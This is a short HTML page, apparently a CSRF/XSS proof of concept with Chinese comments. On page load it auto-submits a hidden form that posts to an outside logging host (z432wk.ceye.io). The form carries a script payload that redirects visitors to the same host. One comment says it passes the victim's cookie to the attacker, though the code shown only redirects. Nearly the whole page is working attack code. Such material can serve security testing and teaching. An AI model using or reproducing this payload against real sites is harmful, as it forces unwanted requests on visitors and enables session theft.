<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
<!--页面加载后立即执行：点击触发表单提交执行ation跳转指定页面-->
</head>
<body>
<form style='visibility:hidden' method="post" action="http://z432wk.ceye.io/">
<!--隐藏表单，指定表单触发action转跳至可信网址-->
    <input id="xssr_in" type="text" name="message" value=
    "<script>
document.location = 'http://z432wk.ceye.io/';
	</script>"
	 />
	 <!--获取cookie并转递给攻击方进行处理-->
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
